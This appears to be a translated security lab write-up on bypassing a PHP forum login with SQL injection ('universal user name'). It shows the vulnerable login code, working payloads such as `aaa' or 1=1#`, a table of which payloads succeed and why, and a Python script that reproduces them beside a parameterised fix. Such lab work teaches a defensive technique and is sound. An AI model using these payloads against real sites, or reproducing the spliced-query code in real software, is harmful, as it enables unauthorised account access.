[business security-04] universal user name and universal password experiment
2022-06-27 13:48:00 【Like the wind 9】
Contents
1 Experiment introduction
1.1 Experiment purpose
Because the web server does not filter user input rigorously enough before building the query, there is a risk that a universal user name or universal password bypasses the login.
Deepen the understanding of web page code and of the SQL statements it builds.
1.2 Experimental environment
Experimental target: a win2008 virtual machine.
The experimental range in this section is a simple website built with phpstudy on a win2008 system. The installation of win2008 and phpstudy is described in 《【Language environment】WAMP environment deployment and optimization, with win2008R2SP1 as the operating system》, and the construction of the website in 《【(SQL+HTML+PHP) comprehensive】A case of comprehensive development of a simple forum website (with user registration, sign in, cancellation, information modification, messages and other functions)》.
This experiment is conducted on the login page of the forum.

The login code of the website, which checks the account name and password, is as follows.

```php
<?php
include "../inc/dblink.inc.php"; // include the database connection file ($link) in this file
?>
<html>
<head>
<meta charset="utf-8">
<title>Sign in ---- Forum today</title>
</head>
<body>
<h1>Forum today BBS</h1>
<?php
if(isset($_POST['userSubmit'])){
    if($_POST['vcode']==$_COOKIE['vcode']){
        $userName=$_POST['userName'];
        $userPass=$_POST['userPass'];
        // The user name is spliced straight into the query (the injection point of this
        // experiment); the password only reaches the query as an md5 hex digest
        $sql="select * from users where name='".$userName."' && password='".md5($userPass)."'";
        if($results=mysqli_query($link,$sql)){
            if(mysqli_num_rows($results)>0){
                setcookie('name',$userName,time()+3600*24, "/PHP/jrltbbs");
                // Be careful with the cookie path: cookies with different paths are treated as two cookies
                echo "Login successful, return to the <a href='../index.php'>home page</a> or <a href='./index.php'>personal center</a>";
            }else{
                echo "Wrong user name or password, <a href='./login.php'>please log in again</a>";
            }
        }else{
            die("There is a mistake in the SQL statement");
        }
    }else{
        echo "Verification code error, <a href='./login.php'>please log in again</a>";
    }
}else{
    $html=<<<HTML
<form method="post">
user name: <input type="text" name="userName"><br/>
password: <input type="password" name="userPass"><br/>
Verification Code: <input type="text" name="vcode">
<iframe src="./vcode.php" width="100" height="30" frameborder="0"></iframe><br>
<input type="submit" name="userSubmit" value="Sign in">
</form>
HTML;
    echo $html;
}
?>
<hr/>
</body>
</html>
<?php
mysqli_close($link);
?>
```
From the SQL statement above it can be seen that the key variable is `name`, not `password`: whatever is typed into the password field is passed through md5() first, so it can never be spliced into the SQL statement.
2 Experiment
2.1 Experimental analysis
(1) The `$sql=...` line in the code above builds the query that checks whether the account and password entered by the client exist in the database. The login succeeds when the `mysqli_num_rows($results)>0` check is true; in other words, as long as the constructed user name or password makes the SQL statement execute successfully and return at least one row, you can log in.
(2) Because the values in the SQL statement are enclosed in single quotation marks, the constructed input must close the quotation mark before it and neutralise the quotation mark after it (by commenting out the rest of the statement, or by absorbing it into a new quoted literal).
2.2 Experimental process
(1) Enter the URL http://172.16.1.1/PHP/jrltbbs/member/login.php to open the login page of the website.
(2) On the login page enter the user name `aaa' or 1=1#`, any password, and click login.
(3) The login succeeds.
(4) Click the personal center: the currently logged-in account is the first account registered in the database.

2.3 Summary of the experimental results: universal user name and universal password
The experiment was repeated with different combinations of user names and passwords; the results are listed below. For the user-name payloads in the table (such as `aaa` and `a`), note that whether or not that user exists in the database leads to different results.
| user name | password | result | analysis |
|---|---|---|---|
| `aaa' or 1=1#` | any | success | The single quotation mark closes the quoted value before the variable; `#` comments out the rest of the statement, including the password check, leaving `name='aaa' or 1=1`, which is always true. |
| `aaa' or '1'='1` | any | failure | Because `&&` (AND) binds more tightly than `or`, the statement is evaluated as `name='aaa' or ('1'='1' && password='<md5 of any>')`. The right-hand side is false because the password hash does not match, and `name='aaa'` is false because no such user exists, so the query returns no rows and the login fails. |
| `a' or '1'='1` | any | success | Unlike the previous combination, `a` happens to be a user name that exists in the database, so `name='a'` is true on its own and the `or` expression is true. Suitable for guessing (blasting) specific user names. |
| `a'#` | any | success | Again `a` is an existing user name; `#` comments out the password check, so the query returns that user's row. Suitable for guessing specific user names. |
| any | `aaa' or 1=1#` | failure | The password field is passed through md5() in the code, so it reaches the SQL statement only as a hex digest and no statement can be constructed from it. |
| any | `aaa' or '1'='1'` | failure | Same as above. |
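The following script is an added example and is not code from the original page or from the forum project. It reproduces the analysis in 2.1 and every row of the results table by building the login query with exactly the string splicing of `login.php`, then running it against a constructed table of users, and it places the hardened (parameterised) query beside the vulnerable one. Assumptions: an in-memory SQLite database stands in for the MySQL server of the experiment; the two MySQL-specific spellings in the payloads are replaced by forms both engines accept, `&&` by `AND` and the `#` line comment by `-- ` (MySQL requires the trailing space); and the sample users `a` (registered first) and `tom`, with made-up passwords, are constructed for the demonstration. The operator precedence that decides which payloads work (AND binding tighter than OR) is the same in both engines.

```python
import hashlib
import sqlite3

# Added example, not code from the original page. SQLite stands in for MySQL;
# the payloads use `-- ` instead of MySQL's `#` comment and the query uses AND
# instead of `&&`, which both engines accept. Users and passwords are constructed.
USERS = [("a", "pass_a"), ("tom", "pass_tom")]  # 'a' is the first registered account


def md5_hex(s: str) -> str:
    """Mirror the PHP md5($userPass): a 32-character hex digest, never a quote."""
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed users table; passwords are stored as md5 hex like the forum."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (name text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [(n, md5_hex(p)) for n, p in USERS])
    return conn


def build_vulnerable_sql(user_name: str, user_pass: str) -> str:
    """Same string splicing as the page's login.php, in the SQLite dialect."""
    return ("select * from users where name='" + user_name +
            "' AND password='" + md5_hex(user_pass) + "'")


def vulnerable_login(conn, user_name, user_pass):
    """Return the name of the first row the spliced query matches, or None.
    The PHP `mysqli_num_rows($results)>0` check becomes 'a row came back'."""
    try:
        row = conn.execute(build_vulnerable_sql(user_name, user_pass)).fetchone()
    except sqlite3.Error:
        return None  # the PHP die()s when the spliced statement is malformed
    return row[0] if row else None


def safe_login(conn, user_name, user_pass):
    """Hardened variant: placeholders keep the input out of the SQL grammar."""
    row = conn.execute(
        "select * from users where name=? AND password=?",
        (user_name, md5_hex(user_pass))).fetchone()
    return row[0] if row else None


# The (user name, password) combinations from the results table.
PAYLOADS = [
    ("aaa' or 1=1-- ", "whatever"),     # universal user name, no user 'aaa' needed
    ("aaa' or '1'='1", "whatever"),     # fails: AND binds tighter than OR
    ("a' or '1'='1", "whatever"),       # works only because user 'a' exists
    ("a'-- ", "whatever"),              # works only because user 'a' exists
    ("whatever", "aaa' or 1=1-- "),     # password is md5()'d: no injection
    ("whatever", "aaa' or '1'='1'"),    # same
]


def run_table(conn=None):
    """Return {(user, pass): (vulnerable_result, parameterised_result)}."""
    if conn is None:
        conn = make_db()
    return {p: (vulnerable_login(conn, *p), safe_login(conn, *p)) for p in PAYLOADS}


if __name__ == "__main__":
    db = make_db()
    for (u, p), (vuln, safe) in run_table(db).items():
        print(f"{u!r:22} {p!r:22} -> spliced: {vuln!r:7} parameterised: {safe!r}")
        print("    ", build_vulnerable_sql(u, p))
```

Running it prints the spliced statement for each row, which makes the precedence failure visible: the `aaa' or '1'='1` payload produces `name='aaa' or '1'='1' AND password='<hash>'`, so the only way for it to return a row is for `name` to match an existing user. The parameterised variant returns no row for any payload and still logs in `a` and `tom` with their real passwords.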
Note: when the back-end code filters or transforms the input parameters, the various bypass techniques covered earlier need to be applied.
3 Summary
(1) Deepen the understanding of SQL statement construction and bypass;
(2) Master the method of detecting universal user names and passwords.